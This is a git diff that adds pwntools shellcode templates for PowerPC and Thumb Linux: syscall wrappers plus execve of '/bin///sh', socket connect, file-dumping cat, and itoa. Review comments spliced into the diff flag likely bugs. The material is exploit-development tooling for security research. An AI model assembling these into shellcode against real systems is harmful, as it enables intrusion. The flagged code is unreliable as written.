+++ b/pwnlib/shellcraft/templates/powerpc/linux/wait4.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="pid, stat_loc, options, usage"/>
+<%docstring>
+Invokes the syscall wait4. See 'man 2 wait4' for more information.
+
+Arguments:
+ pid(pid_t): pid
+ stat_loc(WAIT_STATUS): stat_loc
+ options(int): options
+ usage(rusage): usage
+
+
+ ${syscall('SYS_wait4', pid, stat_loc, options, usage)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/waitid.asm b/pwnlib/shellcraft/templates/powerpc/linux/waitid.asm
new file mode 100644
index 000000000..3a8892f5d
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/waitid.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="idtype, id, infop, options"/>
+<%docstring>
+Invokes the syscall waitid. See 'man 2 waitid' for more information.
+
+Arguments:
+ idtype(idtype_t): idtype
+ id(id_t): id
+ infop(siginfo_t): infop
+ options(int): options
+
+
+ ${syscall('SYS_waitid', idtype, id, infop, options)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/waitpid.asm b/pwnlib/shellcraft/templates/powerpc/linux/waitpid.asm
new file mode 100644
index 000000000..14725ecdf
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/waitpid.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="pid, stat_loc, options"/>
+<%docstring>
+Invokes the syscall waitpid. See 'man 2 waitpid' for more information.
+
+Arguments:
+ pid(pid_t): pid
+ stat_loc(int): stat_loc
+ options(int): options
+
+
+ ${syscall('SYS_waitpid', pid, stat_loc, options)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/write.asm b/pwnlib/shellcraft/templates/powerpc/linux/write.asm
new file mode 100644
index 000000000..b19fd67a9
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/write.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, buf, n"/>
+<%docstring>
+Invokes the syscall write. See 'man 2 write' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(void): buf
+ n(size_t): n
+
+
+ ${syscall('SYS_write', fd, buf, n)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/writev.asm b/pwnlib/shellcraft/templates/powerpc/linux/writev.asm
new file mode 100644
index 000000000..8e7821616
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/writev.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, iovec, count"/>
+<%docstring>
+Invokes the syscall writev. See 'man 2 writev' for more information.
+
+Arguments:
+ fd(int): fd
+ iovec(iovec): iovec
+ count(int): count
+
+
+ ${syscall('SYS_writev', fd, iovec, count)}
diff --git a/pwnlib/shellcraft/templates/thumb/crash.asm b/pwnlib/shellcraft/templates/thumb/crash.asm
new file mode 100644
index 000000000..1bb9e70c6
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/crash.asm
@@ -0,0 +1,12 @@
+<% from pwnlib.shellcraft.thumb import mov %>
+<%docstring>
+Crash.
+
+Example:
+
+ >>> run_assembly(shellcraft.crash()).poll(True) < 0
+ True
+
+ pop {r0-r12,lr}
+ ldr sp, [sp, 64]
+ bx r1
diff --git a/pwnlib/shellcraft/templates/thumb/itoa.asm b/pwnlib/shellcraft/templates/thumb/itoa.asm
new file mode 100644
index 000000000..0a2c5813b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/itoa.asm
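Review bot: The docstring of crash.asm is the single word `Crash.`, which tells a reader nothing about how the crash is produced or which registers are clobbered; I would replace it with `Crashes the process: pops r0-r12 and lr off the stack, reloads sp from [sp, 64] and branches to whatever ended up in r1.` so the doctest's `poll(True) < 0` expectation has some context. The `mov` imported in the first line of the template is never used and can be dropped.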
@@ -0,0 +1,75 @@
+<%
+from pwnlib.shellcraft import pretty, value, common, registers
+from pwnlib.shellcraft.thumb import mov, pushstr, udiv_10, setregs
+from pwnlib import constants
+%>
+<%docstring>
+Converts an integer into its string representation, and pushes it
+onto the stack. Uses registers r0-r5.
+
+Arguments:
+ v(str, int):
+ Integer constant or register that contains the value to convert.
+ alloca
+
+Example:
+
+ >>> sc = shellcraft.thumb.mov('r0', 0xdeadbeef)
+ >>> sc += shellcraft.thumb.itoa('r0')
+ >>> sc += shellcraft.thumb.linux.write(1, 'sp', 32)
+ >>> run_assembly(sc).recvuntil('\x00')
+ '3735928559\x00'
+
+<%page args="v, buffer='sp', allocate_stack=True"/>
+<%
+itoa_loop = common.label('itoa_loop')
+size_loop = common.label('size_loop')
+one_char = common.label('one_char')
+assert v in registers.thumb
+%>\
+ /* atoi(${pretty(v,0)}) */
+%if allocate_stack and buffer=='sp':
+ sub sp, sp, 0x10
+%endif
+## REGISTER USAGE
+##
+## r0: Value (also used in udiv_10)
+## r1: Used in udiv_10
+## r2: Used in udiv_10
+## r3: Length of string, current character
+## r4: Buffer pointer
+## r5: Remainder
+ ${setregs({'r0': v,
+ 'r3': 0,
+ 'r4': buffer})}
+## Save for later
+ push {r0}
+## Calculate how many characters are needed.
+## e.g. 0 -> 1
+## 1 -> 1
+## 23 -> 2
+## 1234 -> 4
+${size_loop}:
+ add r3, r3, 1
+ ${udiv_10('r0')}
+ cmp r0, 1
+ bhs ${size_loop}
+## Calculate the end of the buffer and null-terminate
+## N.B. r0 == 0 here
+ add r3, r4, r3
+ strb r0, [r3, #1]
+## Grab saved "original value" off the stack
+ pop {r0}
+${itoa_loop}:
+ ${mov('r5', 'r0')} /* save before division */
+ ${udiv_10('r0')}
+## Multiply back by 10 to get remainder
+ /* multiply by 10 to get remainder in r5 */
+ ${mov('r1', 10)}
+ umull r1, r2, r0, r1
+ sub r5, r5, r1
+ /* store the byte, decrement, check complete */
+ add r5, r5, ${ord('0')}
+ strb r5, [r3, #-1]!
+ cmp r3, r4
+ bgt ${itoa_loop}
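Review bot: The NUL terminator appears to land one byte too far: after the size loop r3 holds the digit count, `add r3, r4, r3` makes r3 = buffer + len, and `strb r0, [r3, #1]` then stores the zero at buffer+len+1, while the pre-decrementing `strb r5, [r3, #-1]!` loop fills buffer..buffer+len-1, so buffer+len is never written and the doctest only passes if that stack byte happens to be zero; `strb r0, [r3]` would terminate directly after the last digit. The guard `assert v in registers.thumb` also contradicts the docstring, which says `v` may be an integer constant as well as a register, so either the docstring should drop the constant case or the assert should go and `setregs` be left to load it. The Arguments section should list `buffer` and `allocate_stack` (the `alloca` entry is an unfinished stub), the comment `/* atoi(${pretty(v,0)}) */` should say `itoa`, and the label `one_char` is created but never referenced.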
diff --git a/pwnlib/shellcraft/templates/thumb/linux/accept.asm b/pwnlib/shellcraft/templates/thumb/linux/accept.asm
new file mode 100644
index 000000000..114f91387
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/accept.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, addr, addr_len"/>
+<%docstring>
+Invokes the syscall accept. See 'man 2 accept' for more information.
+
+Arguments:
+ fd(int): fd
+ addr(SOCKADDR_ARG): addr
+ addr_len(socklen_t): addr_len
+
+
+ ${syscall('SYS_accept', fd, addr, addr_len)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/access.asm b/pwnlib/shellcraft/templates/thumb/linux/access.asm
new file mode 100644
index 000000000..6e3166500
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/access.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="name, type"/>
+<%docstring>
+Invokes the syscall access. See 'man 2 access' for more information.
+
+Arguments:
+ name(char): name
+ type(int): type
+
+
+ ${syscall('SYS_access', name, type)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/acct.asm b/pwnlib/shellcraft/templates/thumb/linux/acct.asm
new file mode 100644
index 000000000..dfce9308e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/acct.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="name"/>
+<%docstring>
+Invokes the syscall acct. See 'man 2 acct' for more information.
+
+Arguments:
+ name(char): name
+
+
+ ${syscall('SYS_acct', name)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/alarm.asm b/pwnlib/shellcraft/templates/thumb/linux/alarm.asm
new file mode 100644
index 000000000..5bb8f0865
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/alarm.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="seconds"/>
+<%docstring>
+Invokes the syscall alarm. See 'man 2 alarm' for more information.
+
+Arguments:
+ seconds(unsigned): seconds
+
+
+ ${syscall('SYS_alarm', seconds)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/bind.asm b/pwnlib/shellcraft/templates/thumb/linux/bind.asm
new file mode 100644
index 000000000..80d55df2f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/bind.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, addr, len"/>
+<%docstring>
+Invokes the syscall bind. See 'man 2 bind' for more information.
+
+Arguments:
+ fd(int): fd
+ addr(CONST_SOCKADDR_ARG): addr
+ len(socklen_t): len
+
+
+ ${syscall('SYS_bind', fd, addr, len)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/brk.asm b/pwnlib/shellcraft/templates/thumb/linux/brk.asm
new file mode 100644
index 000000000..3466d8e58
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/brk.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="addr"/>
+<%docstring>
+Invokes the syscall brk. See 'man 2 brk' for more information.
+
+Arguments:
+ addr(void): addr
+
+
+ ${syscall('SYS_brk', addr)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/cat.asm b/pwnlib/shellcraft/templates/thumb/linux/cat.asm
new file mode 100644
index 000000000..7f5380392
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/cat.asm
@@ -0,0 +1,25 @@
+<%
+ from pwnlib import constants
+ from pwnlib.shellcraft import thumb
+ from pwnlib.shellcraft import common
+%>
+<%page args="filename, fd=1"/>
+<%docstring>
+Opens a file and writes its contents to the specified file descriptor.
+
+Example:
+
+ >>> f = tempfile.mktemp()
+ >>> write(f, 'FLAG\n')
+ >>> run_assembly(shellcraft.arm.to_thumb()+shellcraft.thumb.linux.cat(f)).recvline()
+ 'FLAG\n'
+
+
+<%
+label = common.label("sendfile_loop")
+%>
+
+ ${thumb.pushstr(filename)}
+ ${thumb.linux.open('sp', 0, constants.O_RDONLY)}
+ ${thumb.mov('r5', 'r0')}
+ ${thumb.linux.sendfile(fd, 'r5', 0, 0x7fffffff)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/chdir.asm b/pwnlib/shellcraft/templates/thumb/linux/chdir.asm
new file mode 100644
index 000000000..4b548ae39
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/chdir.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="path"/>
+<%docstring>
+Invokes the syscall chdir. See 'man 2 chdir' for more information.
+
+Arguments:
+ path(char): path
+
+
+ ${syscall('SYS_chdir', path)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/chmod.asm b/pwnlib/shellcraft/templates/thumb/linux/chmod.asm
new file mode 100644
index 000000000..2d444f3c4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/chmod.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="file, mode"/>
+<%docstring>
+Invokes the syscall chmod. See 'man 2 chmod' for more information.
+
+Arguments:
+ file(char): file
+ mode(mode_t): mode
+
+
+ ${syscall('SYS_chmod', file, mode)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/chown.asm b/pwnlib/shellcraft/templates/thumb/linux/chown.asm
new file mode 100644
index 000000000..f2db3165e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/chown.asm
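Review bot: In cat.asm the second `<% %>` block assigns `label = common.label("sendfile_loop")` but nothing references the label, so either the loop it hints at (sendfile can return short) was never written or the block is dead and should go. The docstring has no Arguments section; I would add `filename(str): path of the file to open read-only` and `fd(int): descriptor the contents are written to, default 1`, and mention that a single `sendfile` of up to 0x7fffffff bytes is issued. The descriptor returned by `open` is moved into r5 and used unchecked, so a failed open only shows up as a failed sendfile; that is worth one sentence in the docstring since nothing signals it to the caller.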
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="file, owner, group"/>
+<%docstring>
+Invokes the syscall chown. See 'man 2 chown' for more information.
+
+Arguments:
+ file(char): file
+ owner(uid_t): owner
+ group(gid_t): group
+
+
+ ${syscall('SYS_chown', file, owner, group)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/chroot.asm b/pwnlib/shellcraft/templates/thumb/linux/chroot.asm
new file mode 100644
index 000000000..e0a605006
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/chroot.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="path"/>
+<%docstring>
+Invokes the syscall chroot. See 'man 2 chroot' for more information.
+
+Arguments:
+ path(char): path
+
+
+ ${syscall('SYS_chroot', path)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/clock_getres.asm b/pwnlib/shellcraft/templates/thumb/linux/clock_getres.asm
new file mode 100644
index 000000000..95b916808
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/clock_getres.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="clock_id, res"/>
+<%docstring>
+Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information.
+
+Arguments:
+ clock_id(clockid_t): clock_id
+ res(timespec): res
+
+
+ ${syscall('SYS_clock_getres', clock_id, res)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/thumb/linux/clock_gettime.asm
new file mode 100644
index 000000000..06e95d596
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/clock_gettime.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="clock_id, tp"/>
+<%docstring>
+Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information.
+
+Arguments:
+ clock_id(clockid_t): clock_id
+ tp(timespec): tp
+
+
+ ${syscall('SYS_clock_gettime', clock_id, tp)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/thumb/linux/clock_nanosleep.asm
new file mode 100644
index 000000000..13b8bdcec
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/clock_nanosleep.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="clock_id, flags, req, rem"/>
+<%docstring>
+Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information.
+
+Arguments:
+ clock_id(clockid_t): clock_id
+ flags(int): flags
+ req(timespec): req
+ rem(timespec): rem
+
+
+ ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/clock_settime.asm b/pwnlib/shellcraft/templates/thumb/linux/clock_settime.asm
new file mode 100644
index 000000000..c4e578fb1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/clock_settime.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="clock_id, tp"/>
+<%docstring>
+Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information.
+
+Arguments:
+ clock_id(clockid_t): clock_id
+ tp(timespec): tp
+
+
+ ${syscall('SYS_clock_settime', clock_id, tp)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/clone.asm b/pwnlib/shellcraft/templates/thumb/linux/clone.asm
new file mode 100644
index 000000000..52ea2c5b8
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/clone.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fn, child_stack, flags, arg, vararg"/>
+<%docstring>
+Invokes the syscall clone. See 'man 2 clone' for more information.
+
+Arguments:
+ fn(int): fn
+ child_stack(void): child_stack
+ flags(int): flags
+ arg(void): arg
+ vararg(int): vararg
+
+
+ ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/close.asm b/pwnlib/shellcraft/templates/thumb/linux/close.asm
new file mode 100644
index 000000000..a3ec97688
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/close.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd"/>
+<%docstring>
+Invokes the syscall close. See 'man 2 close' for more information.
+
+Arguments:
+ fd(int): fd
+
+
+ ${syscall('SYS_close', fd)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/connect.asm b/pwnlib/shellcraft/templates/thumb/linux/connect.asm
index b4863ac86..2ec13aa49 100644
--- a/pwnlib/shellcraft/templates/thumb/linux/connect.asm
+++ b/pwnlib/shellcraft/templates/thumb/linux/connect.asm
@@ -1,5 +1,9 @@
-<% from pwnlib.shellcraft import thumb %>
-<% from pwnlib.util.net import sockaddr %>
+<%
+ from pwnlib.shellcraft.thumb import push, mov, pushstr
+ from pwnlib.shellcraft.thumb.linux import syscall
+ from pwnlib.constants import SOCK_STREAM, SYS_socket, SYS_connect
+ from pwnlib.util.net import sockaddr
+%>
 <%page args="host, port, network='ipv4'"/>
 <%docstring>
 Connects to the host on the specified port.
@@ -9,22 +13,14 @@
 <%
 sockaddr, addr_len, address_family = sockaddr(host, port, network)
 %>\
- /* First create socket */
- ${thumb.mov('r7', 'SYS_socket')}
- ${thumb.mov('r0', address_family)}
- ${thumb.mov('r1', 'SOCK_STREAM')}
- eor r2, r2
- svc 1
+/* open new socket */
+ ${syscall(SYS_socket, address_family, SOCK_STREAM, 0)}
- /* Save socket in r6 */
- mov r6, r0
+/* save opened socket */
+ ${mov('r6', 'r0')}
- /* Create address structure on stack */
- ${thumb.pushstr(sockaddr, False)}
+/* push sockaddr, connect() */
+ ${pushstr(sockaddr, False)}
+ ${syscall(SYS_connect, 'r6', 'sp', addr_len)}
- /* Connect the socket */
- ${thumb.mov('r7', 'SYS_connect')}
- ${thumb.mov('r0', 'r6')}
- ${thumb.mov('r1', 'sp')}
- ${thumb.mov('r2', addr_len)}
- svc 1
+/* Socket that is maybe connected is in r6 */
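Review bot: In connect.asm the first hunk imports `push` from `pwnlib.shellcraft.thumb` but nothing in the new body uses it, and the same hunk switches to the constant objects `SYS_socket`/`SYS_connect` while every other template in this commit passes the string form `'SYS_...'` to `syscall`; one convention should be picked so the generated and hand-written templates read the same. The closing comment `/* Socket that is maybe connected is in r6 */` is the only hint that connect()'s result is never examined; I would state it in the docstring instead, e.g. `Leaves the socket descriptor in r6 and the return value of connect() in r0; the caller must check r0 before using the socket.` The docstring body sits between the two hunks and is outside this view.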
diff --git a/pwnlib/shellcraft/templates/thumb/linux/creat.asm b/pwnlib/shellcraft/templates/thumb/linux/creat.asm
new file mode 100644
index 000000000..a0d4d3cb2
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/creat.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="file, mode"/>
+<%docstring>
+Invokes the syscall creat. See 'man 2 creat' for more information.
+
+Arguments:
+ file(char): file
+ mode(mode_t): mode
+
+
+ ${syscall('SYS_creat', file, mode)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/dup2.asm b/pwnlib/shellcraft/templates/thumb/linux/dup2.asm
new file mode 100644
index 000000000..b8cfb0fe7
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/dup2.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, fd2"/>
+<%docstring>
+Invokes the syscall dup2. See 'man 2 dup2' for more information.
+
+Arguments:
+ fd(int): fd
+ fd2(int): fd2
+
+
+ ${syscall('SYS_dup2', fd, fd2)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/dup3.asm b/pwnlib/shellcraft/templates/thumb/linux/dup3.asm
new file mode 100644
index 000000000..4b8903dfe
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/dup3.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, fd2, flags"/>
+<%docstring>
+Invokes the syscall dup3. See 'man 2 dup3' for more information.
+
+Arguments:
+ fd(int): fd
+ fd2(int): fd2
+ flags(int): flags
+
+
+ ${syscall('SYS_dup3', fd, fd2, flags)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/echo.asm b/pwnlib/shellcraft/templates/thumb/linux/echo.asm
new file mode 100644
index 000000000..6aafa20b6
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/echo.asm
@@ -0,0 +1,14 @@
+<% from pwnlib.shellcraft import thumb %>
+<%page args="string, sock = '1'"/>
+<%docstring>
+Writes a string to a file descriptor
+
+Example:
+
+ >>> run_assembly(shellcraft.echo('hello\n', 1)).recvline()
+ 'hello\n'
+
+
+
+${thumb.pushstr(string, append_null = False)}
+${thumb.linux.syscall('SYS_write', sock, 'sp', len(string))}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_create.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_create.asm
new file mode 100644
index 000000000..d597247da
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_create.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="size"/>
+<%docstring>
+Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information.
+
+Arguments:
+ size(int): size
+
+
+ ${syscall('SYS_epoll_create', size)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_create1.asm
new file mode 100644
index 000000000..e416db03c
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_create1.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="flags"/>
+<%docstring>
+Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information.
+
+Arguments:
+ flags(int): flags
+
+
+ ${syscall('SYS_epoll_create1', flags)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_ctl.asm
new file mode 100644
index 000000000..df17011b4
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_ctl.asm
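Review bot: The docstring of echo.asm has no Arguments section, and the default `sock = '1'` is a string whereas the doctest passes the integer `1`, so the accepted types are left to the reader to guess; I would add `string(str): data to write; exactly len(string) bytes are written and no NUL is appended` and `sock(int, str): file descriptor, or a register holding one, default 1`. Whether `'1'` and `1` are treated identically depends on how `syscall` resolves its operands, which is outside this hunk and worth confirming before documenting the default.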
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="epfd, op, fd, event"/>
+<%docstring>
+Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information.
+
+Arguments:
+ epfd(int): epfd
+ op(int): op
+ fd(int): fd
+ event(epoll_event): event
+
+
+ ${syscall('SYS_epoll_ctl', epfd, op, fd, event)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_pwait.asm
new file mode 100644
index 000000000..3eb3b04dc
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_pwait.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="epfd, events, maxevents, timeout, ss"/>
+<%docstring>
+Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information.
+
+Arguments:
+ epfd(int): epfd
+ events(epoll_event): events
+ maxevents(int): maxevents
+ timeout(int): timeout
+ ss(sigset_t): ss
+
+
+ ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_wait.asm
new file mode 100644
index 000000000..b5d363d00
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_wait.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="epfd, events, maxevents, timeout"/>
+<%docstring>
+Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information.
+
+Arguments:
+ epfd(int): epfd
+ events(epoll_event): events
+ maxevents(int): maxevents
+ timeout(int): timeout
+
+
+ ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/execve.asm b/pwnlib/shellcraft/templates/thumb/linux/execve.asm
new file mode 100644
index 000000000..73cada992
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/execve.asm
@@ -0,0 +1,26 @@
+<%
+ from pwnlib.shellcraft import thumb
+ from pwnlib.abi import linux_arm_syscall
+%>
+<%docstring>
+Execute a different process.
+
+<%page args="path = '/bin///sh', argv=[], envp={}"/>
+<%
+if isinstance(envp, dict):
+ envp = ['%s=%s' % (k,v) for (k,v) in envp.items()]
+
+regs = linux_arm_syscall.register_arguments
+%>
+% if argv:
+ ${thumb.pushstr_array(regs[2], argv)}
+% else:
+ ${thumb.mov(regs[2], 0)}
+% endif
+% if envp:
+ ${thumb.pushstr_array(regs[3], envp)}
+% else:
+ ${thumb.mov(regs[3], 0)}
+% endif
+ ${thumb.pushstr(path)}
+ ${thumb.syscall('SYS_execve', 'sp', regs[2], regs[3])}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/exit.asm b/pwnlib/shellcraft/templates/thumb/linux/exit.asm
new file mode 100644
index 000000000..d5cf39c69
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/exit.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="status"/>
+<%docstring>
+Invokes the syscall exit. See 'man 2 exit' for more information.
+
+Arguments:
+ status(int): status
+
+
+ ${syscall('SYS_exit', status)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/faccessat.asm b/pwnlib/shellcraft/templates/thumb/linux/faccessat.asm
new file mode 100644
index 000000000..d7cc471e9
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/faccessat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.thumb.linux import syscall
+%>
+<%page args="fd, file, type, flag"/>
+<%docstring>
+Invokes the syscall faccessat. See 'man 2 faccessat' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ type(int): type
+ flag(int): flag
+
+
+ ${syscall('SYS_faccessat', fd, file, type, flag)}
diff --git a/pwnlib/shellcraft/templates/thumb/linux/fallocate.asm b/pwnlib/shellcraft/templates/thumb/linux/fallocate.asm
new file mode 100644
index 000000000..6ef6008b3
--- /dev/null
+++ b/pwnlib/shellcraft/templates/thumb/linux/fallocate.asm
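Review bot: The last line of execve.asm calls `thumb.syscall('SYS_execve', ...)`, whereas the other hand-written thumb templates in this commit reach the helper as `thumb.linux.syscall` (echo.asm) or import it from `pwnlib.shellcraft.thumb.linux` (connect.asm); unless a `syscall` template is also exposed directly under `pwnlib.shellcraft.thumb`, this fails at render time, so `${thumb.linux.syscall('SYS_execve', 'sp', regs[2], regs[3])}` looks like the intended call. The docstring `Execute a different process.` should also document `path`, `argv` and `envp`, in particular that a dict `envp` is flattened to `KEY=VALUE` strings and that an empty `argv` or `envp` is passed as a NULL pointer (the `% else` branches emit `mov(regs[n], 0)`) rather than as an empty array.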
